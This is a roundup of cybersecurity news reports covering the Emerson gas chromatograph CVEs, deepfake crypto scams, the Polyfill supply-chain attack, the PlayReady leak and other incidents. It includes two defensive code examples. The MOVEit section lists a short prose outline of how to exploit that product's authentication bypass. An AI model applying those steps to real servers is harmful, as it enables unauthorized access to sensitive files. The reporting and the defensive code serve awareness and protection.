To study the Emerson Rosemount 370XA gas chromatograph, commonly used in industrial settings for gas analysis, the researchers set out to emulate the system. This complex process was undertaken because the physical device could cost over $100,000 while the research was limited to a six-week project. The emulation process involved downloading and extracting the device firmware from the official Emerson Rosemount website, and searching for an application that implements its proprietary protocols. The researchers used the QEMU emulator to emulate the PowerPC architecture used by the gas chromatograph and run the extracted firmware. Upon investigation, the researchers uncovered four key vulnerabilities:
  • CVE-2023-46687: Allows remote execution of root-level commands without authentication (CVSS score: 9.8)
  • CVE-2023-49716: Enables authenticated users to run arbitrary commands remotely (CVSS score: 6.9)
  • CVE-2023-51761: Permits unauthenticated users to bypass authentication and gain admin access by resetting passwords (CVSS score: 8.3)
  • CVE-2023-43609: Allows unauthenticated users to access sensitive information or cause denial-of-service (CVSS score: 6.9)
The U.S. Cybersecurity and Infrastructure Security Agency issued an advisory in January warning that successful attacks could lead to "denial-of-service conditions" and unauthorized system access. The affected models include GC370XA, GC700XA and GC1500XA running firmware versions 4.1.5 and earlier.

Industry Impact and Mitigation

Gas chromatographs play a crucial role in various sectors, from environmental monitoring to medical diagnostics. Compromised devices could have far-reaching consequences. In food processing, attacks on chromatographs might prevent accurate bacteria detection, halting production. In healthcare settings, disrupted blood sample analysis could impact patient care. Emerson has released updated firmware addressing these vulnerabilities. The Claroty researchers said they "appreciate Emerson for its swift response and cooperation, which demonstrates their dedication to our shared goal." Emerson advises customers to apply the patches and implement current cybersecurity industry best practices. The firm stated, "In addition, Emerson recommends end users continue to utilize current cybersecurity industry best practices and in the event such infrastructure is not implemented within an end user’s network, action should be taken to ensure the Affected Product is connected to a well-protected network and not connected to the Internet." In its advisory CISA shared the following recommendations for securing these systems:
  • Minimize network exposure: Ensure that control system devices and/or systems are not publicly accessible from the internet.
  • Locate control system networks: Place remote devices behind firewalls and isolate them from business networks.
  • Secure remote access: Use Virtual Private Networks (VPNs) to secure remote access. However, the agency also warned of potential inherent risks in VPNs, asking organizations and businesses to be aware of them.
"CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures," the advisory stated.

Scammers Promoted Fake Donald Trump Live Stream Urging Cryptocurrency Donations During Presidential Debate

Fake Trump Cryptocurrency Promotion Scam Presidential Debate

A convincing live stream featuring a seemingly legitimate Donald Trump YouTube channel quickly gained massive traction before the U.S. Presidential debate Thursday, reaching nearly half the subscriber count of the official Donald Trump YouTube channel before it was taken down. The channel and Trump deepfake urged viewers to donate in cryptocurrency, with promises of substantial rewards in exchange. The video was titled with keywords related to the official Presidential debate between Trump and Biden while sharing a fake promotional website and QR code for donations through Bitcoin, Ethereum, Doge and Tether cryptocurrencies.

Fake Trump Cryptocurrency Promotion Scam Streamed Ahead of Presidential Debate

The timing of the fake live stream coincided with the scheduled debate this week between current U.S. President Joe Biden and former President and challenger Donald J. Trump. Scammers behind the campaign appeared to be taking advantage of actual statements made by Trump supporting cryptocurrency in the past, coupled with a repeated AI-generated video in which he sits alongside popular YouTuber Logan Paul and speaks about promoting cryptocurrency within the United States if elected.
[Image: Screenshot taken from the livestream.]
The fake video appears to stem from an edit of a podcast video in which Trump joined the YouTuber to speak on various issues, including the election, U.S. politics, his personal life and his opponent. The edited fake video shared a QR code and website (donaldtrump[.]gives) where viewers could be tricked into making donations. The website incorporates official Trump campaign branding for the 2024 presidential election, sharing instructions for participation in the "unique event," a multiplier to lure visitors with calculations of how much cryptocurrency they would receive in return for their donation, and a "live" feed of ongoing donations made to the shared cryptocurrency addresses.
[Image: Cryptocurrency addresses involved with the scam]
"During this unique event, you have the opportunity to take a share of 2,000 BTC & 50,000 ETH & 500,000,000 DOGE & 50,000,000 USDT. Have a look at the rules and don't miss out on this. You can only participate once!" the scam website stated. According to details from a WhoIs lookup, the website appears to have been registered on June 27th, the same day as the Presidential debate, using a Russian registrant.

YouTube Channel Connected To Scam Taken Down

The YouTube channel behind this promotion was taken down shortly after a report to YouTube, but the website promoted during the stream still appears to be up and running. The channel was noted to have about 1.38 million subscribers before its takedown, nearly half the subscriber count (2.9 million) of the official Donald J Trump YouTube channel.
[Image: Email confirmation of channel takedown]
It is unknown whether the live transaction feed featured on the scam website reflects actual real-time transactions. The full extent of, and the victim count from, this cryptocurrency scam are unknown; details of the campaign have been sent to CRIL (Cyble Research and Intelligence Labs) researchers for further investigation.
[Image: Screenshot of alleged transactions]
The campaign highlights the threat of Artificial Intelligence content to election-related processes, legitimate campaign donations and impersonation of candidates or well-known figures. In a recent incident, crypto scammers had taken over the YouTube channel of Channel 7 News Australia to use a deepfake Elon Musk to promote dubious crypto investments.

Data Security Officer from Philippines Admits to Hacking 93 Different Websites

Philippines National Security

A data security officer from the Manila Bulletin has admitted to hacking 93 websites, including government and private company sites, as well as servers abroad. The hacker, known by the alias "Kangkong," was arrested along with two others by the National Bureau of Investigation (NBI) Cybercrime Division on June 19 following reports of multiple unauthorized access attempts and breaches. Kangkong issued a public apology to President Marcos, the general public, and especially the military community for his actions.

Implications for Philippines National Security

Kangkong's hacking spree exposed significant vulnerabilities in the cybersecurity measures of various organizations. Among the high-profile targets were the peacekeeping operations center website of the Armed Forces of the Philippines, the mail server of the National Security Council, and the Join the PH Army website. The hacker and two other individuals were arrested by the National Bureau of Investigation (NBI) Cybercrime Division on June 19 after reports of multiple unauthorized access attempts and breaches on websites.
[Image: Arrested data officer Kangkong. Source: www.onenews.ph]
The hacker acknowledged the serious consequences of his actions, including the potential exposure of sensitive data of soldiers to foreign entities. "That's when I realized that we have many enemies and we should not be going against each other," Kangkong stated. The officer revealed in an interview with ABS-CBN that he had left specific pictures on compromised websites as proof of his involvement.

Senior Technology Officer May Be Implicated

In his extrajudicial confession, Kangkong initially implicated Art Samaniego, Manila Bulletin's senior technology officer, as the person who ordered the hacking of several websites. However, he later expressed regret for this claim. Samaniego has denied allegations that he ordered the hacking to boost his social media reach. The NBI Cybercrime Division has issued a subpoena for Samaniego to explain his side to the authorities. Meanwhile, the Manila Bulletin has suspended Samaniego pending an internal investigation. Kangkong also pointed to the inadequate cybersecurity measures protecting government and private companies' websites, stating that this was a key factor in his ability to hack them, and his confession highlights the urgent need for improved cybersecurity measures in the Philippines. "Cybersecurity is not really a priority in the Philippines," he stated, urging organizations to invest in better security measures despite the associated costs.

Recently Disclosed Progress MOVEit Transfer Flaw Observed Being Actively Exploited

Progress MOVEit Vulnerability

A newly disclosed vulnerability in Progress MOVEit Transfer has sparked concern among cybersecurity experts due to the lingering memory of high-profile attacks by ransomware gangs using a different vulnerability last year that hit organizations such as the BBC and FBI. The new authentication bypass flaw, officially designated CVE-2024-5806, could potentially allow unauthorized access to sensitive data. MOVEit Transfer, designed for large-scale enterprise use, boasts features compliant with regulations like PCI and HIPAA. It offers various file transfer methods, including SFTP and HTTPS, making it a critical component in many organizations' data management infrastructure. Progress initially kept details of CVE-2024-5806 under wraps, advising customers to patch systems before its disclosure. On June 25th, 2024, Progress officially un-embargoed the vulnerability, revealing that it affects both MOVEit Transfer version 2023.0 and newer, as well as MOVEit Gateway version 2024.0 and newer.

Progress MOVEit Vulnerability Details

WatchTowr Labs was sent details of the vulnerability by a user who identified as 'dav1d_bl41ne' on its IRC channel, an unusual method of vulnerability sharing, the researchers noted. The researchers decided to investigate further, setting up a test environment to replicate the vulnerability.
[Image: MOVEit Vulnerability. Source: labs.watchtowr.com]
The debugger output from the test environment showed that the server was throwing exceptions and attempting to access files in unexpected ways. Upon further investigation, the researchers discovered that the vulnerability could be exploited by providing a valid file path instead of the SSH public key during authentication. This led to the server attempting to access the file, giving the attacker unauthorized access to the system. The researchers shared the following steps on exploiting the vulnerability:
  • Upload a public key to the File Transfer server.
  • Rather than supplying a legitimate public key, send a file path to the public key, signing the authentication request with the same public key.
  • The key will be accepted by the server with successful login, allowing for the access of target files.
The flaw affects MOVEit Transfer versions 2023.0 and newer, as well as MOVEit Gateway 2024.0 and later. Progress describes it as an "Improper Authentication vulnerability" in the SFTP module that could lead to "Authentication Bypass in limited scenarios." In limited scenarios, CVE-2024-5806 allows for authentication bypass, potentially giving attackers unauthorized access to sensitive files. The vulnerability is particularly concerning because the software is widely used among enterprises, making it a prime target for APT groups, ransomware gangs, and other malicious actors. Progress has shared the following recommendations to prevent exploitation of the flaw:
  • Block public inbound RDP access to MOVEit Transfer server(s).
  • Limit outbound access on MOVEit Transfer server(s) to only trusted endpoints.
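The researchers' description boils down to a server accepting a filesystem path where key material was expected. Below is a strict parser for the OpenSSH public key line format that cannot be satisfied by a path, added here to illustrate the hardened form (example code, not MOVEit's own); the accepted key types are an assumption and the sample keys are constructed from zero bytes.

```python
import base64
import struct

# Key types the service chooses to accept (an assumption for this example).
ALLOWED_KEY_TYPES = {"ssh-ed25519", "ssh-rsa", "ecdsa-sha2-nistp256"}
MAX_KEY_TEXT = 16 * 1024


class InvalidPublicKey(ValueError):
    """Raised for anything that is not a well-formed public key line."""


def _read_string(blob, offset):
    """Read one RFC 4251 'string' (uint32 big-endian length + bytes)."""
    if offset + 4 > len(blob):
        raise InvalidPublicKey("truncated length field")
    (length,) = struct.unpack(">I", blob[offset:offset + 4])
    start, end = offset + 4, offset + 4 + length
    if end > len(blob):
        raise InvalidPublicKey("string runs past the end of the key blob")
    return blob[start:end], end


def parse_openssh_public_key(value):
    """Strictly parse an OpenSSH public key line: '<type> <base64> [comment]'.

    Returns (key_type, wire_fields). The submitted text is only ever treated
    as key material: it must start with a known type, the second token must
    be valid base64, the decoded blob must consist entirely of well-formed
    strings, and the blob's embedded type must equal the declared type.
    A filesystem path fails at the first or second of these checks.
    """
    if not isinstance(value, str) or len(value) > MAX_KEY_TEXT:
        raise InvalidPublicKey("not a string, or oversized")
    parts = value.strip().split(None, 2)
    if len(parts) < 2:
        raise InvalidPublicKey("expected '<type> <base64>'")
    key_type, encoded = parts[0], parts[1]
    if key_type not in ALLOWED_KEY_TYPES:
        raise InvalidPublicKey(f"unsupported key type {key_type!r}")
    try:
        blob = base64.b64decode(encoded, validate=True)
    except ValueError as exc:          # binascii.Error is a ValueError subclass
        raise InvalidPublicKey("key blob is not valid base64") from exc
    fields, offset = [], 0
    while offset < len(blob):          # every byte must belong to some field
        field, offset = _read_string(blob, offset)
        fields.append(field)
    if len(fields) < 2 or fields[0] != key_type.encode("ascii"):
        raise InvalidPublicKey("embedded key type does not match declared type")
    return key_type, fields


def is_acceptable_public_key(value):
    """Boolean wrapper suitable for an upload or authentication handler."""
    try:
        parse_openssh_public_key(value)
        return True
    except InvalidPublicKey:
        return False


def build_openssh_key(key_type, fields):
    """Encode wire fields into a public key line; used here only to construct
    sample keys (32 zero bytes are not a real key)."""
    blob = b"".join(struct.pack(">I", len(f)) + f
                    for f in [key_type.encode("ascii"), *fields])
    return f"{key_type} {base64.b64encode(blob).decode('ascii')}"


if __name__ == "__main__":
    good = build_openssh_key("ssh-ed25519", [bytes(32)])
    samples = [
        good,                                     # well-formed key: accepted
        "/etc/ssh/ssh_host_ed25519_key.pub",      # a path where a key belongs
        "ssh-ed25519 /srv/uploads/user.pub",      # a path in the blob position
        "ssh-ed25519 " + build_openssh_key("ssh-rsa", [bytes(32)]).split()[1],
        good + "AAAA",                            # trailing bytes after the key
    ]
    for sample in samples:
        print(f"{is_acceptable_public_key(sample)!s:5}  {sample[:60]}")
```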
According to a post on X from The Shadowserver Foundation, the foundation has already observed active exploitation attempts using the vulnerability soon after its disclosure.
[Image: MOVEit Vulnerability Exploitation. Source: X.com]

Implications of the MOVEit Vulnerability

The discovery of this vulnerability soon after major exploitation last year has reignited discussions about the security of file transfer solutions in enterprise environments. The potential for unauthorized access to sensitive files could have far-reaching consequences for the large number of enterprises that rely on MOVEit Transfer. While the full extent of the vulnerability's impact is still being assessed, the incident has sparked more debate about responsible disclosure practices in the cybersecurity community. Some argue that early, private notifications to affected parties are crucial, while others advocate for more transparent, public disclosures to ensure widespread awareness and prompt action. As the situation develops, IT administrators and security professionals are advised to stay vigilant, monitor for any signs of exploitation, and implement recommended security measures to protect their MOVEit Transfer deployments.

Scammers Spotted Promoting Fake Olympics Cryptocurrency With AI Generated Imagery

Olympics 2024 ICO Scam

Scammers are exploiting the buzz around the 2024 Paris Olympics to lure victims into investing in initial coin offerings (ICOs). These scams tend to promise big returns on "Olympic" tokens. The campaigns manufacture hype around such offerings through fake websites, AI-generated images, and social media campaigns to entice investors.

Olympics Initial Coin Offerings (ICO) Fraud

Researchers from Trend Micro uncovered a recent scheme that claimed to offer an official "Olympics Games Token" for sale. The Olympic Games Token ICO website, theolympictoken[.]com, was registered on March 30, 2024, and its website went live a day later. The website also links to a legitimate Olympics 2024 logo and a countdown to the event, making it seem like a legitimate project.
[Image: Olympics Games Token ICO. Source: trendmicro.com]
It linked to a "whitepaper" – a document explaining the project's tech and goals. But that link led nowhere useful. Instead of details, it dumped visitors on the official Olympics website. Red flag number one. A Twitter account and Telegram channel pushed followers to buy tokens ASAP. When the original site got shut down, a near-identical one (olympictokensolana[.]com) popped up under a new name. The researchers spotted at least ten other websites using 2024 Olympics-associated branding to lure victims into ICO scams; some of them were shut down shortly after their discovery.

Use of AI-Generated Images in Olympics ICO Scams

[Image: Olympics Crypto ICO. Source: trendmicro.com]
The researchers remarked that AI-generated images are becoming increasingly common in such ICO scams, as they offer a cost-effective and time-efficient way to create convincing lures. Cybercriminals can use AI to generate text, correct spelling and grammatical errors, and even create sentences in languages they do not speak.
[Image: Olympics ICO AI Scam. Source: trendmicro.com]
The researchers spotted at least three other Olympics ICO scam websites using AI-generated imagery for promotion.

Spotting Fake ICO Campaigns

ICOs have gained significant attention as cryptocurrency continues to be adopted in various industries. While most new tokens lack utility and are simply memecoins, it does not always mean they are scams. Investors should be vigilant and look out for potential scams and rug-pulls. A legitimate ICO should have a proper website and social media presence, a transparent team, an active community, a comprehensive whitepaper, legitimacy of claims, token distribution, smart contract audit, and liquidity management. The researchers have shared the following guidelines to help identify such scams:
  • Proper website and social media presence: The researchers stated that scam sites are often poorly designed or lack active presence on social media.
  • Transparent team: Cross-check the identities and credentials of the teams behind the offering. Anonymity is a red flag.
  • Active community: Genuine projects have engaged followers on platforms like Discord, Twitter or Telegram, which suggests genuine interest and support.
  • Comprehensive whitepaper: A whitepaper that outlines the project's goals, utility, and technical aspects, which demonstrates a thorough understanding of the project's concept and planning.
  • Legitimacy of claims: Claims backed by verifiable evidence, such as partnerships, use cases, and endorsements.
  • Token distribution: Avoid projects with highly concentrated token ownership which might increase the chances of exit scams.
  • Smart contract audit: Audit by reputable third-parties, which identify vulnerabilities.
  • Liquidity management: Liquidity is locked to prevent premature withdrawals and is decentralized among the community, which secures investors' funds.
In the case of the Olympic Games Token, the website raised several red flags such as a very low number of token holders and an invalid whitepaper link. Investors and those interested in cryptocurrency should follow adequate precautions to avoid falling victim to such scams. Experts have been monitoring Olympics-related search engine results and social media activity to counter fraudulent ticketing scams and coordinated disinformation campaigns.

South Korean ISP Accused of Installing Malware on Devices of 600,000 Who Used Torrenting Services

South Korean KT ISP Torrenting

South Korean telecommunications giant KT is under investigation for allegedly hacking the systems of customers who used torrent services such as web hard drives (Webhard), a popular file-sharing service in the country. The scandal, which has been ongoing for nearly five months, has affected an estimated 600,000 customers, with the police investigation revealing that KT may have operated a dedicated malware team.

Malware Infiltrated Systems of Torrenting Subscribers

The incident came to light in May 2020 when numerous web hard drives suddenly stopped working. Users flooded company forums with complaints about unexplained errors. An investigation revealed that malware had infiltrated the "Grid Program," software that enables direct data exchange between users.
[Image: KT South Korean ISP Malware. Source: mnews.jtbc.co.kr]
The malware, which was designed to interfere with BitTorrent traffic, was allegedly used to monitor and control the internet activities of KT subscribers. The police believe that the motive behind this hacking was to reduce network-related costs, as torrent transfers can be costly for internet service providers. KT, however, claims that it was merely trying to manage traffic on its network to ensure a smooth user experience. KT instead stated that the Webhard services were malicious; however, after the Gyeonggi Southern District Office conducted raids on KT facilities, investigators came to believe the ISP may have violated communications and network laws. A police follow-up investigation found that KT operated a dedicated team responsible for developing, distributing, and operating the malware program. The hacking was traced to KT's Bundang IDC Center, one of its data centers. Over five months, an estimated 20,000 PCs were infected daily. The malware reportedly created strange folders, made files invisible, and disabled web hard programs.

Legal and Ethical Implications

KT and Webhard companies have a history of conflict, including lawsuits. While a previous court ruled in KT's favor regarding traffic blocking of grid services, the current situation differs significantly. KT was alleged to have planted malicious code on individual users' PCs without consent or explanation. South Korean legal experts question KT's methods, suggesting the company could have pursued formal procedures through its legal team instead of resorting to hacking. The incident raises serious concerns about privacy, corporate responsibility, and the extent to which internet service providers can control network traffic. The scandal has also raised concerns about the security of KT's customers' data, with many wondering what other sensitive information may have been compromised. The company's CEO has since resigned, and the company's reputation has taken a significant hit.

Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

Polyfill Supply Chain Attack Compromises Over 100,000 Websites

Polyfill Injection 34

A widespread supply chain attack has hit more than 100,000 websites, including notable platforms like JSTOR, Intuit, and the World Economic Forum. The attack stems from a fake domain impersonating the popular open-source library Polyfill.js, which supports older browsers. In February, the Chinese company Funnull had acquired the domain and GitHub account associated with the project, leading to the injection of malware into sites that embed cdn.polyfill.io. The malicious code is designed to redirect mobile users to sports betting sites or pornographic sites using a fake Google Analytics domain.

Malicious Polyfill Injection and Its Impact

Researchers stated that the injected malware is dynamically generated based on HTTP headers, making it difficult to detect and potentially allowing multiple attack vectors. The Polyfill injection attack is a classic example of a supply chain attack against a widely used library. (Image: Polyfill injection; at least 104183 websites might be affected. Source: publicwww.com) Researchers from Sansec decoded one variant that redirects mobile users to a sports betting site using a fake Google Analytics domain. The malware employs sophisticated techniques and defenses against reverse engineering to evade detection, including:
  •  Activating only on specific mobile devices at certain hours
  •  Avoiding execution when an admin user is detected
  •  Delaying activation when web analytics services are present
The attack's scope is significant, with Google already blocking Google Ads for e-commerce sites using polyfill.io. Researchers later reported that their infrastructure had been subjected to DDoS attacks after reporting on the campaign.

Mitigation and Recommendations

Andrew Betts, the original Polyfill author, took to X to advise against the usage of Polyfill altogether, stating that modern browsers no longer require it. He added that he had no influence over the sale of the project and was never in possession of the new domain, and cautioned that websites that serve third-party scripts are a huge security concern. (Screenshots of the posts: source X.com, @triblondon) Experts have set up a domain (polykill.io) to warn against the compromise of the project and have recommended the following steps for website owners:
  • Immediately remove usage of cdn.polyfill.io from websites and projects.
  • Replace it with a secure alternative such as those offered by Fastly and CloudFlare. Fastly has saved and hosted an earlier version (https://polyfill-fastly.io/) of the project's codebase from before its sale to Funnull.
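As an added example (not code from the article, polykill.io, Fastly or Cloudflare), a small Node.js audit script that finds script tags loading from the polyfill.io hosts named above and rewrites them to the Fastly mirror; the host list, the rewrite target and the sample HTML are constructed assumptions for illustration:

```javascript
// Added example, not from the article: audit HTML for <script> tags that
// load from the compromised polyfill.io hosts and rewrite them to the
// polyfill-fastly.io mirror. Host list and sample HTML are constructed.
const COMPROMISED_HOSTS = new Set(["cdn.polyfill.io", "polyfill.io"]);
const REPLACEMENT_HOST = "polyfill-fastly.io";

// <script ... src="..."> or src='...', case-insensitive, any attribute order.
const SCRIPT_SRC_RE = /<script\b[^>]*\bsrc\s*=\s*(["'])(.*?)\1[^>]*>/gi;

// Parse a script src; protocol-relative "//host/path" URLs need a scheme
// before URL() accepts them. Relative paths (no host) return null.
function parseSrc(src) {
  try {
    return new URL(src.startsWith("//") ? "https:" + src : src);
  } catch {
    return null;
  }
}

// Return every script tag whose host is on the compromised list.
function findPolyfillScripts(html) {
  const hits = [];
  for (const m of html.matchAll(SCRIPT_SRC_RE)) {
    const url = parseSrc(m[2]);
    if (url && COMPROMISED_HOSTS.has(url.hostname)) {
      hits.push({ tag: m[0], src: m[2], host: url.hostname });
    }
  }
  return hits;
}

// Point matching tags at the replacement host, keeping path and query string.
function rewritePolyfillScripts(html) {
  return html.replace(SCRIPT_SRC_RE, (tag, _quote, src) => {
    const url = parseSrc(src);
    if (!url || !COMPROMISED_HOSTS.has(url.hostname)) return tag;
    url.hostname = REPLACEMENT_HOST;
    return tag.replace(src, url.toString());
  });
}

// Constructed sample page: two compromised references, two benign ones.
const SAMPLE_HTML = `<html><head>
<script src="https://cdn.polyfill.io/v3/polyfill.min.js?features=es6"></script>
<script async src='//polyfill.io/v3/polyfill.min.js'></script>
<script src="/static/app.js"></script>
<script src="https://example.com/lib.js"></script>
</head></html>`;

for (const h of findPolyfillScripts(SAMPLE_HTML)) console.log("found:", h.src);
```

Run it over exported page templates or a crawl of rendered HTML; a rewrite is only a stopgap, since the author's advice above is to drop the polyfill entirely.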
The website cautioned of the risks associated with the takeover of the project:
"There are many risks associated with allowing an unknown foreign entity to manage and serve JavaScript within your web application. They can quietly observe user traffic, and if malicious intent were taken, they can potentially steal usernames, passwords and credit card information directly as users enter the information in the web browser."
CloudFlare had also published its findings and recommendations in response to concerns over the compromise of domains. The company stated in a blog article:
"The concerns are that any website embedding a link to the original polyfill.io domain, will now be relying on Funnull to maintain and secure the underlying project to avoid the risk of a supply chain attack. Such an attack would occur if the underlying third party is compromised or alters the code being served to end users in nefarious ways, causing, by consequence, all websites using the tool to be compromised."
This incident serves as a stark reminder of the security implications of relying on external code libraries and third-party scripts, of the importance of vigilance in maintaining website integrity, and of the potential for malicious takeover of massively deployed projects.

Microsoft Engineer Accidentally Leaked 4GB of PlayReady DRM Internal Code Used To Protect Streaming Services

A Microsoft software engineer accidentally published internal PlayReady DRM source code on a publicly accessible developer forum. The 4GB data leak contains sufficient information to compile the required DLL from the source code, potentially opening the door for reverse engineering or cracking of the DRM protection technology. PlayReady, introduced in 2007, is Microsoft's platform-independent digital rights management (DRM) system used for protecting media files. It includes encryption, output protection, and digital rights management features. The leak could have significant implications for the security of this widely-used technology.

PlayReady DRM Internal Code Leak

In early June, a Microsoft engineer published information about an Apple TV service crash on a Surface Pro 9 device in a public forum. The shared data included a 771MB file attachment that, upon extraction, revealed 4GB of internal code related to Microsoft PlayReady. (Image: original post before deletion. Source: security-explorations.com) The leaked PlayReady data is said to include:
  • WarBird configurations for creating the PlayReady library
  • WarBird libraries for code obfuscation functions
  • Libraries with symbolic information related to PlayReady
(Image: partial directory view of the leaked data. Source: security-explorations.com)

HD Keys Could Be Decrypted

Researchers from cybersecurity company AG Security Research Lab managed to successfully build the required Windows PlayReady DLL library from the leaked internal code, aided by step-by-step instructions provided by another user on the same forum. Their investigation uncovered several deficiencies in Protected Media Path (PMP) components of PlayReady, which could be exploited to access plaintext content keys secured by the system on Windows 10 and 11 systems. The researchers demonstrated that these extracted keys could successfully decrypt high-definition movies protected by PlayReady. Notably, the vulnerability persists even on systems with hardware DRM capabilities, as this feature can be easily disabled. The root cause appears to lie in the software DRM implementation used by default on Windows 10 systems without hardware DRM capability. Given that Windows 10 still holds a 69% market share worldwide, this vulnerability could potentially affect a significant number of users until the operating system's retirement in October 2025. The team also demonstrated that the technique used to extract plaintext values of content keys could work for other platforms relying on SW Microsoft PlayReady technology in a Windows OS environment.

Implications and Microsoft's Response

The researchers notified Microsoft about the leak on June 12, 2024. While Microsoft removed the forum post within 12 hours, the download link reportedly remained active. On June 26, MSRC stated to the researchers that it had conducted an investigation and determined that the incident was not a vulnerability to the service, as the post had already been taken down. The researchers confirmed that the download link no longer remains active. The incident highlights the ongoing challenges in maintaining the security and secrecy of DRM implementations. It also underscores the importance of adhering to guidelines for handling sensitive information in public forums, as the leak violated Microsoft's own guidelines for posting link reproduction information publicly. These guidelines specify:
  • All information in reports and any comments and replies are publicly visible by default.
  • Don't put anything you want to keep private in the title or content of the initial report, which is public.
  • To maintain your privacy and keep your sensitive information out of public view, exercise caution.

Major Streaming Services Potentially Affected

The same research team had earlier tested Microsoft's Protected Media Path and had discovered that several streaming platforms were affected by vulnerabilities within the environment: Canal+ Online, Netflix, HBO Max, Amazon Prime Video, Sky Showtime, and others. DRM protection is crucial to the video streaming industry, which is valued at $544 billion, making this security breach a matter of serious concern. Microsoft reportedly demonstrated interest in a full disclosure of the stated vulnerabilities and technical details, along with a proof of concept, over its MSRC channel, offering potential rewards for the disclosure. However, the researchers declined, as they felt a full disclosure would have to include a commercial agreement and would jeopardize their own confidential technology and tools along with future research on the Windows operating system. The researchers also believed that Microsoft should focus on conducting a more comprehensive review of its Protected Media Path environment, which could result in the discovery and fixing of additional issues, rather than focusing on a single exploit.

Cyber Attack Forces South Africa’s National Health Laboratory Service To Shut Down Systems

The National Health Laboratory Service (NHLS), South Africa's primary diagnostic pathology service for public healthcare facilities, has fallen victim to a cyber attack. The incident, which occurred over the weekend, has forced the organization to shut down its IT systems, including emails, website, and patient lab test results storage and retrieval systems. NHLS CEO Prof Koleka Mlisana confirmed the breach in a memo to staff, describing it as a "suspected incident" that compromised the security of their IT infrastructure. The attack comes amidst an Mpox outbreak that has already overwhelmed the country's healthcare services. However, the extent of the cyberattack has yet to be determined, even as restoration efforts are underway.

Impact on South Africa's National Health Laboratory Service

NHLS Chief Executive Officer Prof Koleka Mlisana informed staff of the incident in a memo, stating that the breach had caused damage and that the organization was treating the matter with extreme urgency and concern. Mlisana stated, “I regret to inform you that our IT systems are unavailable due to a suspected incident that occurred over the weekend.” Mlisana assured staff that the organization's Incident Response Team was working around the clock to determine the scope of the intrusion and deploy the necessary safeguards to secure systems and data. The NHLS has implemented its "Downtime Protocol" to minimize disruption to services, prioritizing patients' samples and processing, with results communicated directly to clinicians whenever urgent. The cyber attack comes at a critical time for South Africa's healthcare system. The country is currently grappling with an Mpox outbreak, and the NHLS was already facing a significant backlog in toxicology tests as of March. The shutdown of IT systems is likely to exacerbate these challenges. Mzi Gcukumana, the NHLS Communication, Marketing, and PR officer, disclosed: “Preliminary investigation suggests that our Enterprise Resource Planning (Oracle) environment, Laboratory Information System (LIS) (TrakCare) database, and CDW are not affected. Therefore, no patient data has been lost or compromised. All patient data is safe."

Response and Recovery Efforts

“Please rest assured that our priority focus is on data security. We are determined to solve this issue swiftly and transparently,” Mlisana stated to patients. In response to the breach, the NHLS has deployed its Incident Response Team to assess the scope of the intrusion and implement necessary safeguards. Mlisana assured staff that the team is working around the clock to secure systems and data. “I want to take this opportunity to thank you in advance as we all put in our efforts to ensure that disruption to our services is minimised,” Mlisana added. The NHLS had determined that certain sections of its systems, including its backup server, were deleted, requiring the rebuilding of affected systems. Gcukumana stated, “All users will be aware that the NHLS networked laboratory system is heavily reliant on these information technology systems that have been disrupted.” He added, “Unfortunately, this will take time, and investigations thus far have not advanced enough for us to give a timeframe for the restoration of our systems and full service. All stakeholders and the public will be informed as soon as more information becomes available.” The National Department of Health, which oversees the NHLS, has been informed of the incident. A spokesperson for the department called for patience as efforts to resolve the issue continue. As the investigation unfolds, the NHLS has promised regular updates on the compromise and ongoing response activities. The organization emphasizes its commitment to data security and swift, transparent resolution of the issue.